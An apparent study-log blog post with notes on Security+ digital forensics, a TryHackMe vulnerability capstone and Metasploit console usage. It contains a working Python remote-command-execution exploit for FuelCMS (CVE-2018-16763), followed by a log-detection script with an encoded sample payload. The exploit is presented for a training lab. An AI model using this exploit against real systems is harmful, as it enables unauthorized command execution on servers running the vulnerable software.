ITPro.TV: CompTIA Security+ (SY0-601) & TryHackMe: Jr. Penetration Tester

author: Nathan Acks
date: 2022-04-13

ITPro.TV: CompTIA Security+ (SY0-601)

Digital Forensics Concepts

Order of volatility:

Preservation and documentation notes:

Chain of custody is often represented as a simple paper log/form.

Tools of the trade:

TryHackMe: Jr. Penetration Tester

Vulnerability Capstone

I couldn’t get any of the exploits from Exploit DB to work for me, so I wound up doing a web search that landed me on a write-up for this room in GitHub; the provided exploit code is a little rough, but can be cleaned up to produce nice output without too much work:

#!/usr/bin/python3

# Derived from https://github.com/SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763/blob/main/rce.py

import argparse
import requests
from sys import exit
from bs4 import BeautifulSoup
from socket import error

# HTML markers that bracket the command output in the returned page
delimeter1 = '<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">'
delimeter2 = '</div>'

def exploit():
	while True:
		try:
			payload = input("\n[+] OS Command: ")
			response = requests.get(f"{args.URL}/fuel/pages/select/?filter='%2Bpi(%24a%3D('system'))%2B%24a('{payload}')%2B'")
			htmlText = str(BeautifulSoup(response.text,'html.parser'))
			array1 = htmlText.split(delimeter1)
			array2 = array1[1].split(delimeter2)
			print('\n' + array2[-1].replace('\n\n',''))

		except error:
			exit('\n[-] Could Not Connect To Server')

if __name__ == '__main__':

	mainArguments = argparse.ArgumentParser()
	mainArguments.add_argument('URL',help='Target Website Hosting Vulnerable CMS',type=str)
	args = mainArguments.parse_args()

	try:
		exploit()
	except KeyboardInterrupt:
		exit('\n[!] Quitting')
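From the defender's side, the request shape the script above sends is easy to pick out of a web server access log. The following is an added example (not code from the TryHackMe room or the GitHub write-up): it parses combined-format access log lines and flags requests to /fuel/pages/select/ whose filter parameter, once decoded, contains PHP call syntax rather than a plain search string. The log lines, IP addresses and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate filter is a search term; the injection carries PHP calls such
# as pi($a=('system')) and $a('...'), so look for "name(" and "$name(" forms.
SUSPICIOUS = re.compile(r"\bpi\s*\(|\$\w+\s*\(")

# Constructed sample lines (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Apr/2022:10:01:02 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Apr/2022:10:01:07 +0000] "GET /fuel/pages/select/?filter=%27%2Bpi(%24a%3D(%27system%27))%2B%24a(%27id%27)%2B%27 HTTP/1.1" 200 1834',
    '10.0.0.9 - - [13/Apr/2022:10:01:09 +0000] "GET /index.php?filter=pi(1) HTTP/1.1" 404 210',
]

def parse_line(line):
    """Split one access log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    return rec

def is_fuel_rce_attempt(line):
    """True when the request hits the FuelCMS page selector with a filter value
    that looks like injected PHP rather than a search term."""
    rec = parse_line(line)
    if rec is None or not rec["path"].startswith("/fuel/pages/select"):
        return False
    for value in rec["query"].get("filter", []):
        decoded = unquote(value)  # second pass catches double-encoded payloads
        if SUSPICIOUS.search(decoded):
            return True
    return False

def flag_log(lines):
    """Return the source IPs of every line that matches the injection pattern."""
    return [parse_line(l)["ip"] for l in lines if is_fuel_rce_attempt(l)]

if __name__ == "__main__":
    print(flag_log(SAMPLE_LOG))
```

Only the second constructed line is flagged: the first is a normal search and the third uses the same syntax against a path the vulnerable selector does not serve.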

Main Components of Metasploit

Module categories:

Payloads, in turn, can be divided into:

Msfconsole

You can use msfconsole as a shell, but there’s no redirect functionality.

Use history to display a command history.

All settings are scoped to the current module unless explicitly scoped globally (set -g).

The show command can be used with any module type to list modules of that type, though Metasploit is a bit inconsistent about whether the type should be plural or not (show auxiliary vs. show exploits). When used in the context of a module, this usage of show will attempt to filter additional modules in a sensible way; for example, in the context of a Windows exploit, only Windows-based payloads will be shown.

The back command leaves the context of the current module.

Use info to get module information (which is not generally the same as “help”, though it often does contain useful information).

We can limit the search query to a particular type of module using the type: parameter (e.g., search type:exploit wordpress).

Working with Modules

The common RHOSTS module option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as file:/path/to/file.txt).

Note that the PAYLOAD and SESSION parameters are not generally listed by show options, but can still be set if desired.

You can reset individual parameters using unset, and reset the entire module using unset all.

Some exploit modules have a check option which attempts to determine if a target is vulnerable without actually exploiting it. Alternatively, other modules have a paired auxiliary scanner. Many don’t have a check at all. YMMV!

Meterpreter sessions can be backgrounded using the background command, and all sessions can be backgrounded using CTRL + Z. List sessions using the sessions command, and foreground a session using sessions -i #, where # is the session number.